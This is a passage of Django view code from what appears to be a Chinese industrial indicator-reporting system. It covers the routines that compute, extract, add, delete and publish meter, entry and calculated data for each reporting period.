\"SLME\" and newdate.month in [12, 3, 6, 9]:\n value = \"0\"\n elif cond == \"LME\" and newdate.month == 12:\n value = \"0\"\n else:\n value = str(\n round(query_res[0].cumulativequarter, query_res[0].target.digit))\n if col == 'h':\n if cond == \"MAVG\" or cond == \"SAVG\" or cond == \"HAVG\" or cond == \"YAVG\":\n value = str(\n round(query_res.aggregate(Avg('cumulativehalfyear'))[\n 'cumulativehalfyear__avg'],\n query_res[0].target.digit))\n elif cond == \"MMAX\" or cond == \"SMAX\" or cond == \"HMAX\" or cond == \"YMAX\":\n value = str(round(query_res.aggregate(Max('cumulativehalfyear'))[\n \"cumulativehalfyear__max\"],\n query_res[0].target.digit))\n elif cond == \"MMIN\" or cond == \"SMIN\" or cond == \"HMIN\" or cond == \"YMIN\":\n value = str(round(query_res.aggregate(Min('cumulativehalfyear'))[\n \"cumulativehalfyear__min\"],\n query_res[0].target.digit))\n elif cond == \"SLME\" and newdate.month in [12, 3, 6, 9]:\n value = \"0\"\n elif cond == \"LME\" and newdate.month == 12:\n value = \"0\"\n else:\n value = str(\n round(query_res[0].cumulativehalfyear, query_res[0].target.digit))\n if col == 'y':\n if cond == \"MAVG\" or cond == \"SAVG\" or cond == \"HAVG\" or cond == \"YAVG\":\n value = str(\n round(query_res.aggregate(Avg('cumulativeyear'))[\n 'cumulativeyear__avg'],\n query_res[0].target.digit))\n elif cond == \"MMAX\" or cond == \"SMAX\" or cond == \"HMAX\" or cond == \"YMAX\":\n value = str(\n round(query_res.aggregate(Max('cumulativeyear'))[\n \"cumulativeyear__max\"],\n query_res[0].target.digit))\n elif cond == \"MMIN\" or cond == \"SMIN\" or cond == \"HMIN\" or cond == \"YMIN\":\n value = str(\n round(query_res.aggregate(Min('cumulativeyear'))[\n \"cumulativeyear__min\"],\n query_res[0].target.digit))\n elif cond == \"SLME\" and newdate.month in [12, 3, 6, 9]:\n value = \"0\"\n elif cond == \"LME\" and newdate.month == 12:\n value = \"0\"\n else:\n value = str(\n round(query_res[0].cumulativeyear, query_res[0].target.digit))\n\n target_chinese = '<' + target_name + ':' + target_col + ':' + target_cond + '>(' + value + ')'\n if childid:\n target_chinese = \"\"\n formula_chinese = formula_chinese.replace(target_english, target_chinese)\n\n formula_chinese = \"
\" + \\\n calculatedata[0].target.name + \"\" + formula_chinese + \"

\"\n # \"#1机组发电量\" + aa + \" + <发电量:当前值:当天>+1+#1机组发电量 123.2<#1_发电量:当前值:当天>+221.3<发电量:当前值:当天>+1=31.12

\")\n else:\n formula_chinese = \" 外部系统获得 = \" + str(round(calculatedata[0].curvalue, calculatedata[0].target.digit))\n formula_chinese = \"
\" + \\\n calculatedata[0].target.name + \"\" + formula_chinese + \"

\"\n return HttpResponse(formula_chinese)\n\n\ndef reporting_recalculate(request):\n if request.user.is_authenticated():\n app = request.POST.get('app', '')\n cycletype = request.POST.get('cycletype', '')\n reporting_date = request.POST.get('reporting_date', '')\n operationtype = request.POST.get('operationtype', '')\n funid = request.POST.get('funid', '')\n work = None\n status = 1\n data = '计算成功。'\n try:\n funid = int(funid)\n fun = Fun.objects.get(id=funid)\n work = fun.work\n except:\n pass\n\n try:\n app = int(app)\n reporting_date = getreporting_date(reporting_date, cycletype)\n except:\n return HttpResponse(0)\n\n guid = uuid.uuid1()\n cur_target = Target.objects.exclude(state=\"9\").filter(adminapp_id=app, cycletype=cycletype,\n operationtype=operationtype, work=work)\n\n # 所有常数\n all_constant = Constant.objects.exclude(state=\"9\").values()\n all_target = Target.objects.exclude(state=\"9\")\n tableyear = str(reporting_date.year)\n EntryTable = getmodels(\"Entrydata\", tableyear)\n MeterTable = getmodels(\"Meterdata\", tableyear)\n ExtractTable = getmodels(\"Extractdata\", tableyear)\n CalculateTable = getmodels(\"Calculatedata\", tableyear)\n tableList = {\"Entrydata\": EntryTable, \"Meterdata\": MeterTable, \"Extractdata\": ExtractTable,\n \"Calculatedata\": CalculateTable}\n\n for target in cur_target:\n if operationtype == \"17\":\n if target.calculateguid != str(guid):\n try:\n getcalculatedata(target, reporting_date, str(guid), all_constant, all_target, tableList)\n except Exception as e:\n print(e)\n status = 0\n data = '计算失败:{e}'.format(e=e)\n break\n\n return JsonResponse({\n 'status': status,\n 'data': data\n })\n\n\ndef reporting_reextract(request):\n if request.user.is_authenticated():\n app = request.POST.get('app', '')\n cycletype = request.POST.get('cycletype', '')\n reporting_date = request.POST.get('reporting_date', '')\n operationtype = request.POST.get('operationtype', '')\n funid = request.POST.get('funid', '')\n work = None\n try:\n funid = int(funid)\n fun = Fun.objects.get(id=funid)\n work = fun.work\n except:\n pass\n\n try:\n app = int(app)\n reporting_date = getreporting_date(reporting_date, cycletype)\n except:\n return HttpResponse(0)\n\n guid = uuid.uuid1()\n all_target = Target.objects.exclude(state=\"9\").filter(adminapp_id=app, cycletype=cycletype,\n operationtype=operationtype, work=work)\n tableyear = str(reporting_date.year)\n\n EntryTable = getmodels(\"Entrydata\", tableyear)\n MeterTable = getmodels(\"Meterdata\", tableyear)\n ExtractTable = getmodels(\"Extractdata\", tableyear)\n CalculateTable = getmodels(\"Calculatedata\", tableyear)\n tableList = {\"Entrydata\": EntryTable, \"Meterdata\": MeterTable, \"Extractdata\": ExtractTable,\n \"Calculatedata\": CalculateTable}\n\n for target in all_target:\n # 根据指标周期修改reporting_date\n a_cycle_aft_date = get_a_cycle_aft(reporting_date, cycletype)\n if operationtype == \"16\":\n extractdata = getmodels(\"Extractdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target_id=target.id).filter(datadate=reporting_date)\n if len(extractdata) > 0:\n extractdata = extractdata[0]\n # tablename = \"\"\n # try:\n # tablename = target.storage.tablename\n # except:\n # pass\n #\n # rows = []\n # if tablename:\n # try:\n # with connection.cursor() as cursor:\n # reporting_date_stf = reporting_date.strftime(\"%Y-%m-%d %H:%M:%S\")\n # strsql = \"SELECT curvalue FROM {tablename} WHERE target_id='{target_id}' AND datadate='{datadate}' ORDER BY id DESC\".format(\n # tablename=tablename, 
target_id=target.id, datadate=reporting_date_stf\n # )\n # cursor.execute(strsql)\n # rows = cursor.fetchall()\n # connection.close()\n # except Exception as e:\n # pass\n # if len(rows) > 0:\n # try:\n # if target.is_repeat == '2':\n # rownum = 0\n # rowvalue = 0\n # for row in rows:\n # if row[0] is not None:\n # rowvalue += row[0]\n # rownum += 1\n # extractdata.todayvalue = rowvalue / rownum\n # else:\n # extractdata.todayvalue = rows[0][0]\n # extractdata.todayvalue = decimal.Decimal(float(extractdata.todayvalue))\n # extractdata.todayvalue = round(extractdata.todayvalue, target.digit)\n # except:\n # pass\n # if not rows or not target.cycle: # 没取到数据 或者 没有取数周期,根据数据源实时取\n ret = Extract.getDataFromSource(target, a_cycle_aft_date)\n result_list = ret[\"result\"]\n if result_list:\n try:\n if target.is_repeat == '2':\n rownum = 0\n rowvalue = 0\n for row in result_list:\n if row[0] is not None:\n rowvalue += row[0]\n rownum += 1\n extractdata.todayvalue = rowvalue / rownum\n else:\n extractdata.todayvalue = result_list[0][0]\n extractdata.todayvalue = decimal.Decimal(extractdata.todayvalue)\n extractdata.todayvalue = round(extractdata.todayvalue, target.digit)\n except Exception as e:\n print(e)\n extractdata.curvalue = extractdata.todayvalue + extractdata.judgevalue\n if target.cumulative in ['1', '2', '3', '4', '5']:\n cumulative = getcumulative(tableList, target, reporting_date, extractdata.curvalue)\n extractdata.cumulativemonth = cumulative[\"cumulativemonth\"]\n extractdata.cumulativequarter = cumulative[\"cumulativequarter\"]\n extractdata.cumulativehalfyear = cumulative[\"cumulativehalfyear\"]\n extractdata.cumulativeyear = cumulative[\"cumulativeyear\"]\n extractdata.save()\n return HttpResponse(1)\n\n\ndef reporting_new(request):\n if request.user.is_authenticated():\n app = request.POST.get('app', '')\n cycletype = request.POST.get('cycletype', '')\n reporting_date = request.POST.get('reporting_date', '')\n operationtype = request.POST.get('operationtype', '')\n funid = request.POST.get('funid', '')\n work = None\n status = 1\n data = '新增成功。'\n\n try:\n funid = int(funid)\n fun = Fun.objects.get(id=funid)\n work = fun.work\n except:\n pass\n\n try:\n app = int(app)\n reporting_date = getreporting_date(reporting_date, cycletype)\n except:\n status = 0\n data = '应用不存在。'\n else:\n # 生成本次计算guid\n # 数据库中与本次guid不同的指标才参数计算\n guid = uuid.uuid1()\n cur_target = Target.objects.exclude(state=\"9\").filter(\n adminapp_id=app, cycletype=cycletype, operationtype=operationtype, work=work\n ).order_by(\"sort\")\n\n # 所有常数\n all_constant = Constant.objects.exclude(state=\"9\").values()\n all_target = Target.objects.exclude(state=\"9\")\n tableyear = str(reporting_date.year)\n\n EntryTable = getmodels(\"Entrydata\", tableyear)\n MeterTable = getmodels(\"Meterdata\", tableyear)\n ExtractTable = getmodels(\"Extractdata\", tableyear)\n CalculateTable = getmodels(\"Calculatedata\", tableyear)\n tableList = {\"Entrydata\": EntryTable, \"Meterdata\": MeterTable, \"Extractdata\": ExtractTable,\n \"Calculatedata\": CalculateTable}\n\n for target in cur_target:\n # 根据指标周期修改reporting_date\n a_cycle_aft_date = get_a_cycle_aft(reporting_date, cycletype)\n # 电表走字\n if operationtype == \"1\":\n\n all_meterdata = getmodels(\"Meterdata\", str((reporting_date + datetime.timedelta(\n days=-1)).year)).objects.exclude(state=\"9\").filter(target=target,\n datadate=reporting_date + datetime.timedelta(\n days=-1))\n meterdata = getmodels(\"Meterdata\", str(reporting_date.year))()\n if len(all_meterdata) > 0:\n 
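# Yesterday's 24:00 reading becomes today's 00:00 baseline; metervalue is\n                        # then (twentyfourdata - zerodata) scaled by target.magnification.\n                        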
meterdata.zerodata = all_meterdata[0].twentyfourdata if all_meterdata[0].twentyfourdata else 0\n else:\n meterdata.zerodata = 0\n meterdata.twentyfourdata = meterdata.zerodata\n\n tablename = \"\"\n try:\n tablename = target.storage.tablename\n except:\n pass\n # if tablename != \"\":\n rows = []\n if tablename:\n try:\n with connection.cursor() as cursor:\n reporting_date_stf = reporting_date.strftime(\"%Y-%m-%d %H:%M:%S\")\n strsql = \"SELECT curvalue FROM {tablename} WHERE target_id='{target_id}' AND datadate='{datadate}' ORDER BY id DESC\".format(\n tablename=tablename, target_id=target.id, datadate=reporting_date_stf\n )\n cursor.execute(strsql)\n rows = cursor.fetchall()\n finally:\n connection.close()\n\n if len(rows) > 0:\n try:\n meterdata.twentyfourdata = rows[0][0]\n except:\n pass\n if not rows or not target.cycle: # 没取到数据 或者 没有取数周期,根据数据源实时取\n ret = Extract.getDataFromSource(target, a_cycle_aft_date)\n result_list = ret[\"result\"]\n if result_list:\n try:\n meterdata.twentyfourdata = result_list[0][0]\n except:\n pass\n\n meterdata.target = target\n meterdata.datadate = reporting_date\n meterdata.metervalue = decimal.Decimal(meterdata.twentyfourdata) - decimal.Decimal(\n meterdata.zerodata)\n meterdata.todayvalue = decimal.Decimal(meterdata.metervalue) * decimal.Decimal(target.magnification)\n meterdata.todayvalue = round(meterdata.todayvalue, target.digit)\n meterdata.judgevalue = 0\n meterdata.releasestate = ''\n meterdata.curvalue = meterdata.todayvalue + meterdata.judgevalue\n\n if target.cumulative in ['1', '2', '3', '4', '5']:\n cumulative = getcumulative(tableList, target, reporting_date, meterdata.curvalue)\n meterdata.cumulativemonth = cumulative[\"cumulativemonth\"]\n meterdata.cumulativequarter = cumulative[\"cumulativequarter\"]\n meterdata.cumulativehalfyear = cumulative[\"cumulativehalfyear\"]\n meterdata.cumulativeyear = cumulative[\"cumulativeyear\"]\n meterdata.save()\n # 录入\n if operationtype == \"15\":\n entrydata = getmodels(\"Entrydata\", str(reporting_date.year))()\n entrydata.target = target\n entrydata.datadate = reporting_date\n entrydata.todayvalue = 0\n entrydata.judgevalue = 0\n entrydata.curvalue = 0\n entrydata.releasestate = ''\n if target.cumulative in ['1', '2', '3', '4', '5']:\n cumulative = getcumulative(tableList, target, reporting_date, entrydata.curvalue)\n entrydata.cumulativemonth = cumulative[\"cumulativemonth\"]\n entrydata.cumulativequarter = cumulative[\"cumulativequarter\"]\n entrydata.cumulativehalfyear = cumulative[\"cumulativehalfyear\"]\n entrydata.cumulativeyear = cumulative[\"cumulativeyear\"]\n entrydata.save()\n # 提取\n if operationtype == \"16\":\n extractdata = getmodels(\"Extractdata\", str(reporting_date.year))()\n extractdata.target = target\n extractdata.datadate = reporting_date\n extractdata.todayvalue = -9999\n extractdata.judgevalue = 0\n extractdata.releasestate = ''\n\n tablename = \"\"\n try:\n tablename = target.storage.tablename\n except:\n pass\n\n rows = []\n if tablename:\n try:\n cursor = connection.cursor()\n with connection.cursor() as cursor:\n reporting_date_stf = reporting_date.strftime(\"%Y-%m-%d %H:%M:%S\")\n strsql = \"SELECT curvalue FROM {tablename} WHERE target_id='{target_id}' AND datadate='{datadate}' ORDER BY id DESC\".format(\n tablename=tablename, target_id=target.id, datadate=reporting_date_stf\n )\n cursor.execute(strsql)\n rows = cursor.fetchall()\n connection.close()\n except Exception as e:\n pass\n if len(rows) > 0:\n try:\n if target.is_repeat == '2':\n rownum = 0\n rowvalue = 0\n for 
row in rows:\n if row[0] is not None:\n rowvalue += row[0]\n rownum += 1\n extractdata.todayvalue = rowvalue / rownum\n else:\n extractdata.todayvalue = rows[0][0]\n extractdata.todayvalue = decimal.Decimal(float(extractdata.todayvalue))\n extractdata.todayvalue = round(extractdata.todayvalue, target.digit)\n except:\n pass\n if not rows or not target.cycle: # 没取到数据 或者 没有取数周期,根据数据源实时取\n ret = Extract.getDataFromSource(target, a_cycle_aft_date)\n result_list = ret[\"result\"]\n if result_list:\n try:\n if target.is_repeat == '2':\n rownum = 0\n rowvalue = 0\n for row in result_list:\n if row[0] is not None:\n rowvalue += row[0]\n rownum += 1\n extractdata.todayvalue = rowvalue / rownum\n else:\n extractdata.todayvalue = result_list[0][0]\n extractdata.todayvalue = decimal.Decimal(float(extractdata.todayvalue))\n extractdata.todayvalue = round(extractdata.todayvalue, target.digit)\n except Exception as e:\n print(e)\n extractdata.curvalue = extractdata.todayvalue + extractdata.judgevalue\n if target.cumulative in ['1', '2', '3', '4', '5']:\n cumulative = getcumulative(tableList, target, reporting_date, extractdata.curvalue)\n extractdata.cumulativemonth = cumulative[\"cumulativemonth\"]\n extractdata.cumulativequarter = cumulative[\"cumulativequarter\"]\n extractdata.cumulativehalfyear = cumulative[\"cumulativehalfyear\"]\n extractdata.cumulativeyear = cumulative[\"cumulativeyear\"]\n extractdata.save()\n # 计算\n if operationtype == \"17\":\n # 为减少重复计算,判断指标calculate,如果指标calculate等于本次计算guid,则说明该指标在本次计算中以计算过\n if target.calculateguid != str(guid):\n try:\n getcalculatedata(target, reporting_date, str(guid), all_constant, all_target, tableList)\n except Exception as e:\n print(e)\n status = 0\n data = '计算失败:{e}'.format(e=e)\n import traceback\n traceback.print_exc()\n break\n\n return JsonResponse({\n 'status': status,\n 'data': data\n })\n\n\ndef reporting_supply(request):\n if request.user.is_authenticated():\n app = request.POST.get('app', '')\n savedata = request.POST.get('savedata')\n exist_target_id = json.loads(savedata)\n operationtype = request.POST.get('operationtype')\n cycletype = request.POST.get('cycletype', '')\n reporting_date = request.POST.get('reporting_date', '')\n funid = request.POST.get('funid', '')\n work = None\n status = 1\n data = '补充成功。'\n try:\n funid = int(funid)\n fun = Fun.objects.get(id=funid)\n work = fun.work\n except:\n pass\n try:\n app = int(app)\n reporting_date = getreporting_date(reporting_date, cycletype)\n except:\n pass\n # 所有常数\n all_constant = Constant.objects.exclude(state=\"9\").values()\n all_target = Target.objects.exclude(state=\"9\")\n tableyear = str(reporting_date.year)\n\n EntryTable = getmodels(\"Entrydata\", tableyear)\n MeterTable = getmodels(\"Meterdata\", tableyear)\n ExtractTable = getmodels(\"Extractdata\", tableyear)\n CalculateTable = getmodels(\"Calculatedata\", tableyear)\n tableList = {\"Entrydata\": EntryTable, \"Meterdata\": MeterTable, \"Extractdata\": ExtractTable,\n \"Calculatedata\": CalculateTable}\n guid = uuid.uuid1()\n cur_target = Target.objects.exclude(state=\"9\").order_by(\"sort\").filter(adminapp__id=app, operationtype=operationtype,\n cycletype=cycletype, work=work).exclude(id__in=exist_target_id)\n if len(cur_target) <= 0:\n status = 0\n data = '无需补充。'\n else:\n for target in cur_target:\n a_cycle_aft_date = get_a_cycle_aft(reporting_date, cycletype)\n if operationtype == \"1\":\n all_meterdata = getmodels(\"Meterdata\", str((reporting_date + datetime.timedelta(\n 
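# Sketch: the is_repeat == '2' branches above average the first column of the
# fetched rows while skipping NULLs. The same logic as a helper (illustrative
# name), which also avoids a ZeroDivisionError when every value is NULL.
import decimal

def average_first_column(rows):
    values = [decimal.Decimal(str(r[0])) for r in rows if r[0] is not None]
    if not values:
        return None  # caller keeps its -9999 sentinel
    return sum(values) / len(values)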
days=-1)).year)).objects.exclude(state=\"9\").filter(target=target,datadate=reporting_date + datetime.timedelta(days=-1))\n meterdata = getmodels(\"Meterdata\", str(reporting_date.year))()\n if len(all_meterdata) > 0:\n meterdata.zerodata = all_meterdata[0].twentyfourdata if all_meterdata[0].twentyfourdata else 0\n else:\n meterdata.zerodata = 0\n meterdata.twentyfourdata = meterdata.zerodata\n tablename = \"\"\n try:\n tablename = target.storage.tablename\n except:\n pass\n rows = []\n if tablename:\n try:\n with connection.cursor() as cursor:\n reporting_date_stf = reporting_date.strftime(\"%Y-%m-%d %H:%M:%S\")\n strsql = \"SELECT curvalue FROM {tablename} WHERE target_id='{target_id}' AND datadate='{datadate}' ORDER BY id DESC\".format(\n tablename=tablename, target_id=target.id, datadate=reporting_date_stf\n )\n cursor.execute(strsql)\n rows = cursor.fetchall()\n finally:\n connection.close()\n if len(rows) > 0:\n try:\n meterdata.twentyfourdata = rows[0][0]\n except:\n pass\n if not rows or not target.cycle:\n ret = Extract.getDataFromSource(target, a_cycle_aft_date)\n result_list = ret[\"result\"]\n if result_list:\n try:\n meterdata.twentyfourdata = result_list[0][0]\n except:\n pass\n meterdata.target = target\n meterdata.datadate = reporting_date\n meterdata.metervalue = decimal.Decimal(meterdata.twentyfourdata) - decimal.Decimal(\n meterdata.zerodata)\n meterdata.todayvalue = decimal.Decimal(meterdata.metervalue) * decimal.Decimal(target.magnification)\n meterdata.todayvalue = round(meterdata.todayvalue, target.digit)\n meterdata.judgevalue = 0\n meterdata.curvalue = meterdata.todayvalue + meterdata.judgevalue\n if target.cumulative in ['1', '2', '3', '4', '5']:\n cumulative = getcumulative(tableList, target, reporting_date, meterdata.curvalue)\n meterdata.cumulativemonth = cumulative[\"cumulativemonth\"]\n meterdata.cumulativequarter = cumulative[\"cumulativequarter\"]\n meterdata.cumulativehalfyear = cumulative[\"cumulativehalfyear\"]\n meterdata.cumulativeyear = cumulative[\"cumulativeyear\"]\n meterdata.save()\n if operationtype == \"15\":\n entrydata = getmodels(\"Entrydata\", str(reporting_date.year))()\n entrydata.target = target\n entrydata.datadate = reporting_date\n entrydata.todayvalue = 0\n entrydata.judgevalue = 0\n entrydata.curvalue = 0\n if target.cumulative in ['1', '2', '3', '4', '5']:\n cumulative = getcumulative(tableList, target, reporting_date, entrydata.curvalue)\n entrydata.cumulativemonth = cumulative[\"cumulativemonth\"]\n entrydata.cumulativequarter = cumulative[\"cumulativequarter\"]\n entrydata.cumulativehalfyear = cumulative[\"cumulativehalfyear\"]\n entrydata.cumulativeyear = cumulative[\"cumulativeyear\"]\n entrydata.save()\n if operationtype == \"16\":\n extractdata = getmodels(\"Extractdata\", str(reporting_date.year))()\n extractdata.target = target\n extractdata.datadate = reporting_date\n extractdata.todayvalue = -9999\n extractdata.judgevalue = 0\n\n tablename = \"\"\n try:\n tablename = target.storage.tablename\n except:\n pass\n rows = []\n if tablename:\n try:\n cursor = connection.cursor()\n with connection.cursor() as cursor:\n reporting_date_stf = reporting_date.strftime(\"%Y-%m-%d %H:%M:%S\")\n strsql = \"SELECT curvalue FROM {tablename} WHERE target_id='{target_id}' AND datadate='{datadate}' ORDER BY id DESC\".format(\n tablename=tablename, target_id=target.id, datadate=reporting_date_stf\n )\n cursor.execute(strsql)\n rows = cursor.fetchall()\n connection.close()\n except Exception as e:\n pass\n if len(rows) > 0:\n try:\n if 
target.is_repeat == '2':\n rownum = 0\n rowvalue = 0\n for row in rows:\n if row[0] is not None:\n rowvalue += row[0]\n rownum += 1\n extractdata.todayvalue = rowvalue / rownum\n else:\n extractdata.todayvalue = rows[0][0]\n extractdata.todayvalue = decimal.Decimal(\n float(extractdata.todayvalue) * float(target.magnification))\n extractdata.todayvalue = round(extractdata.todayvalue, target.digit)\n except:\n pass\n if not rows or not target.cycle:\n ret = Extract.getDataFromSource(target, a_cycle_aft_date)\n result_list = ret[\"result\"]\n if result_list:\n try:\n if target.is_repeat == '2':\n rownum = 0\n rowvalue = 0\n for row in result_list:\n if row[0] is not None:\n rowvalue += row[0]\n rownum += 1\n extractdata.todayvalue = rowvalue / rownum\n else:\n extractdata.todayvalue = result_list[0][0]\n extractdata.todayvalue = decimal.Decimal(\n float(extractdata.todayvalue) * float(target.magnification))\n extractdata.todayvalue = round(extractdata.todayvalue, target.digit)\n except Exception as e:\n print(e)\n extractdata.curvalue = extractdata.todayvalue + extractdata.judgevalue\n if target.cumulative in ['1', '2', '3', '4', '5']:\n cumulative = getcumulative(tableList, target, reporting_date, extractdata.curvalue)\n extractdata.cumulativemonth = cumulative[\"cumulativemonth\"]\n extractdata.cumulativequarter = cumulative[\"cumulativequarter\"]\n extractdata.cumulativehalfyear = cumulative[\"cumulativehalfyear\"]\n extractdata.cumulativeyear = cumulative[\"cumulativeyear\"]\n extractdata.save()\n if operationtype == \"17\":\n if target.calculateguid != str(guid):\n try:\n getcalculatedata(target, reporting_date, str(guid), all_constant, all_target, tableList)\n except Exception as e:\n print(e)\n status = 0\n data = '计算失败:{e}'.format(e=e)\n import traceback\n traceback.print_exc()\n break\n\n return JsonResponse({\n 'status': status,\n 'data': data\n })\n\n\ndef reporting_del(request):\n if request.user.is_authenticated():\n result = {\n 'status': 1,\n 'data': '删除成功。'\n }\n app = request.POST.get('app', '')\n cycletype = request.POST.get('cycletype', '')\n reporting_date = request.POST.get('reporting_date', '')\n operationtype = request.POST.get('operationtype', '')\n funid = request.POST.get('funid', '')\n work = None\n user_id = request.user.id\n try:\n funid = int(funid)\n fun = Fun.objects.get(id=funid)\n work = fun.work\n app = int(app)\n except:\n result['status'] = 0\n result['data'] = '网络异常。'\n else:\n try:\n reporting_date = getreporting_date(reporting_date, cycletype)\n except:\n result['status'] = 0\n result['data'] = '报表时间处理异常。'\n else:\n all_data = []\n if operationtype == \"1\":\n all_data = getmodels(\"Meterdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app, target__cycletype=cycletype,\n target__work=work,\n datadate=reporting_date)\n if operationtype == \"15\":\n all_data = getmodels(\"Entrydata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app, target__cycletype=cycletype,\n target__work=work,\n datadate=reporting_date)\n if operationtype == \"16\":\n all_data = getmodels(\"Extractdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app,\n target__cycletype=cycletype,\n target__work=work,\n datadate=reporting_date)\n if operationtype == \"17\":\n all_data = getmodels(\"Calculatedata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app,\n target__cycletype=cycletype,\n target__work=work,\n 
datadate=reporting_date)\n\n
                if all_data:\n
                    try:\n
                        # soft-delete the matching rows in the update-data audit log\n
                        for i in all_data:\n
                            UpdateDataLog.objects.exclude(state='9').filter(datadate=reporting_date, target_id=i.target_id).update(state='9')\n
                    except Exception as e:\n
                        pass\n
                    try:\n
                        all_data.update(**{'state': '9', 'releasestate': '0'})\n\n
                        ReportingLog.objects.create(**{\n
                            'write_time': datetime.datetime.now(),\n
                            'datadate': reporting_date,\n
                            'cycletype': cycletype,\n
                            'operationtype': operationtype,\n
                            'adminapp_id': app,\n
                            'work': work,\n
                            'user_id': user_id,\n
                            'type': 'del',\n
                        })\n
                    except Exception as e:\n
                        result['status'] = 0\n
                        result['data'] = '删除失败。'\n
        return JsonResponse(result)\n\n\n
def reporting_release(request):\n
    if request.user.is_authenticated():\n
        result = {\n
            'status': 1,\n
            'data': '发布成功。'\n
        }\n
        app = request.POST.get('app', '')\n
        savedata = request.POST.get('savedata')\n
        savedata = json.loads(savedata)\n
        cycletype = request.POST.get('cycletype', '')\n
        reporting_date = request.POST.get('reporting_date', '')\n
        funid = request.POST.get('funid', '')\n
        work = None\n
        user_id = request.user.id\n\n
        try:\n
            funid = int(funid)\n
            fun = Fun.objects.get(id=funid)\n
            work = fun.work\n
            app = int(app)\n
        except Exception as e:\n
            print(e)\n
            result['status'] = 0\n
            result['data'] = '网络异常。'\n
        else:\n
            try:\n
                reporting_date = getreporting_date(reporting_date, cycletype)\n
            except Exception as e:\n
                result['status'] = 0\n
                result['data'] = '报表时间处理异常。'\n
            else:\n
                # split the payload by operation type\n
                savedata1 = savedata['1']\n
                savedata15 = savedata['15']\n
                savedata16 = savedata['16']\n
                savedata17 = savedata['17']\n\n
                # release each data table; collect the labels of the ones that failed\n
                error_info = ''\n\n
                try:\n
                    getmodels(\"Meterdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n
                        id__in=[int(x['id']) for x in savedata1]).update(releasestate='1')\n
                except Exception as e:\n
                    error_info += '电表走字指标数据,'\n
                    result['status'] = 0\n
                try:\n
                    getmodels(\"Entrydata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n
                        id__in=[int(x['id']) for x in savedata15]).update(releasestate='1')\n
                except Exception as e:\n
                    error_info += '数据录入指标数据,'\n
                    result['status'] = 0\n
                try:\n
                    getmodels(\"Extractdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n
                        id__in=[int(x['id']) for x in savedata16]).update(releasestate='1')\n
                except Exception as e:\n
                    error_info += '数据提取指标数据,'\n
                    result['status'] = 0\n
                try:\n
                    getmodels(\"Calculatedata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n
                        id__in=[int(x['id']) for x in savedata17]).update(releasestate='1')\n
                except Exception as e:\n
                    error_info += '数据计算指标数据'\n
                    result['status'] = 0\n\n
                if result['status']:\n
                    ReportingLog.objects.create(**{\n
                        'write_time': datetime.datetime.now(),\n
                        'datadate': reporting_date,\n
                        'cycletype': cycletype,\n
                        'adminapp_id': app,\n
                        'work': work,\n
                        'user_id': user_id,\n
                        'type': 'release',\n
                    })\n\n
                    # after a release, reset the audit log's raw values to the released values\n
                    try:\n
                        update_obj = UpdateDataLog.objects.exclude(state='9').filter(datadate=reporting_date)\n
                        if update_obj.exists():\n
                            for i in update_obj:\n
                                obj = update_obj.filter(id=i.id)\n
                                obj.update(raw_curvalue=obj[0].after_curvalue)\n
                    except Exception as e:\n
                        pass\n
                else:\n
                    result['data'] = '{0}发布失败。'.format(error_info[:-1] if error_info.endswith(',') else error_info)\n\n
        return JsonResponse(result)\n\n\n
def reporting_cancel_release(request):\n
    if request.user.is_authenticated():\n
        result = {\n
            'status': 1,\n
            'data': '取消成功。'\n
        }\n
        app = request.POST.get('app', '')\n
        savedata = request.POST.get('savedata')\n
        savedata = json.loads(savedata)\n
        cycletype = request.POST.get('cycletype', '')\n
        reporting_date = 
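# Sketch: reporting_del above never removes rows. It flags them state='9' and
# resets releasestate, and marks the matching UpdateDataLog entries the same
# way, so the history stays recoverable. The pattern in condensed form, with
# the year-sharded model passed in (names as used in this module):
def soft_delete_reporting(model, app, cycletype, work, reporting_date):
    qs = model.objects.exclude(state="9").filter(
        target__adminapp_id=app, target__cycletype=cycletype,
        target__work=work, datadate=reporting_date)
    target_ids = list(qs.values_list("target_id", flat=True))
    UpdateDataLog.objects.exclude(state="9").filter(
        datadate=reporting_date, target_id__in=target_ids).update(state="9")
    return qs.update(state="9", releasestate="0")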
request.POST.get('reporting_date', '')\n funid = request.POST.get('funid', '')\n work = None\n user_id = request.user.id\n\n try:\n funid = int(funid)\n fun = Fun.objects.get(id=funid)\n work = fun.work\n app = int(app)\n except Exception as e:\n print(e)\n result['status'] = 0\n result['data'] = '网络异常。'\n else:\n try:\n reporting_date = getreporting_date(reporting_date, cycletype)\n except Exception as e:\n result['status'] = 0\n result['data'] = '报表时间处理异常。'\n else:\n # 分别存入数据库\n savedata1 = savedata['1']\n savedata15 = savedata['15']\n savedata16 = savedata['16']\n savedata17 = savedata['17']\n\n # 发布\n error_info = ''\n\n try:\n getmodels(\"Meterdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n id__in=[int(x['id']) for x in savedata1]).update(releasestate='0')\n except Exception as e:\n error_info += '电表走字指标数据,'\n result['status'] = 0\n try:\n getmodels(\"Entrydata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n id__in=[int(x['id']) for x in savedata15]).update(releasestate='0')\n except Exception as e:\n error_info += '数据录入指标数据,'\n result['status'] = 0\n try:\n getmodels(\"Extractdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n id__in=[int(x['id']) for x in savedata16]).update(releasestate='0')\n except Exception as e:\n error_info += '数据提取指标数据,'\n result['status'] = 0\n try:\n getmodels(\"Calculatedata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n id__in=[int(x['id']) for x in savedata17]).update(releasestate='0')\n except Exception as e:\n error_info += '数据计算指标数据'\n result['status'] = 0\n\n if result['status']:\n ReportingLog.objects.create(**{\n 'write_time': datetime.datetime.now(),\n 'datadate': reporting_date,\n 'cycletype': cycletype,\n 'adminapp_id': app,\n 'work': work,\n 'user_id': user_id,\n 'type': 'cancelrelease',\n })\n else:\n result['data'] = '{0}取消失败。'.format(error_info[:-1] if error_info.endswith(',') else error_info)\n\n return JsonResponse(result)\n\n\ndef reporting_save(request):\n if 